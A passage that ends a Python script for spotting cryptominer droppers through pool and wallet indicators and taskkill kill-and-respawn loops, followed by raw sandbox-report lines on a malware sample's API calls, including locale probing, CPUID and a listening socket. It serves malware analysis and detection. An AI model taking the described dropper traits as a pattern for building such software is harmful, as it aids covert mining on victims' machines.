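            t = TASKKILL_RE.search(cmd)
            if t:
                f.taskkills[t["image"].lower()] += 1
    # A child that the same tree spawns and then force-kills again and again is the
    # kill-and-respawn watchdog pattern seen in this report.
    f.kill_respawn = {img for img in f.taskkills if img in f.spawned}
    return f


def summary(f: Findings) -> list:
    out = []
    for img, d in f.miners.items():
        out.append(f"miner {img}: pool={d['pool']} wallet={d['wallet']} "
                   f"monero_address={d['wallet_looks_monero']}")
    for t in f.scheduled_tasks:
        out.append(f"scheduled task {t.get('tn')}: every {t.get('mo')} {t.get('sc')} "
                   f"-> {t.get('tr')} aggressive={t['aggressive']}")
    for img, n in f.taskkills.items():
        tag = " (kill/respawn loop)" if img in f.kill_respawn else ""
        out.append(f"taskkill /f /im {img} x{n}{tag}")
    return out


if __name__ == "__main__":
    for line in summary(triage(SAMPLE_RECORDS)):
        print(line)
```

Run triage() over any block of process-creation lines copied from a report. The kill_respawn set is the most useful single signal here: an image that the same process tree both spawns and repeatedly force-kills is the watchdog loop of a miner dropper, and it survives renaming of the miner binary, which the wallet and pool indicators do not.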
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_0066A0D3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW, 0_2_0065E14A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW, 0_2_0066A1DA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0066A2A7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: EnumSystemLocalesW, 0_2_0065D6FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_0066994E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW, 0_2_00669B1D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: EnumSystemLocalesW, 0_2_00669BC6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: EnumSystemLocalesW, 0_2_00669C2F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: EnumSystemLocalesW, 0_2_00669CCA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00669D57
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: GetLocaleInfoW, 0_2_00669FAA
Source: C:\ProgramData\SMB.exe Code function: GetLocaleInfoW,GetNumberFormatW, 37_2_0133932E
Source: C:\ProgramData\SMB.exe Code function: 37_2_0133D86B cpuid 37_2_0133D86B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_0041A5F0 GetSystemTimes, 0_2_0041A5F0
Source: C:\ProgramData\SMB.exe Code function: 37_2_0132A930 GetVersionExW, 37_2_0132A930
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Mikey.113879.32606.exe Code function: 0_2_00408D70 htons,WSAStartup,WSASocketA,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,WSACreateEvent,WSAGetLastError,WSACreateEvent,WSAGetLastError,WSAEventSelect,WSAGetLastError,SetEvent,WSAWaitForMultipleEvents,GetLastError,WSAEnumNetworkEvents,WSAGetLastError,WSAAccept,_fwprintf,WSAGetLastError, 0_2_00408D70
Legend of the contacted-IP map (share of IPs): < 25%, 25% to 50%, 50% to 75%, > 75%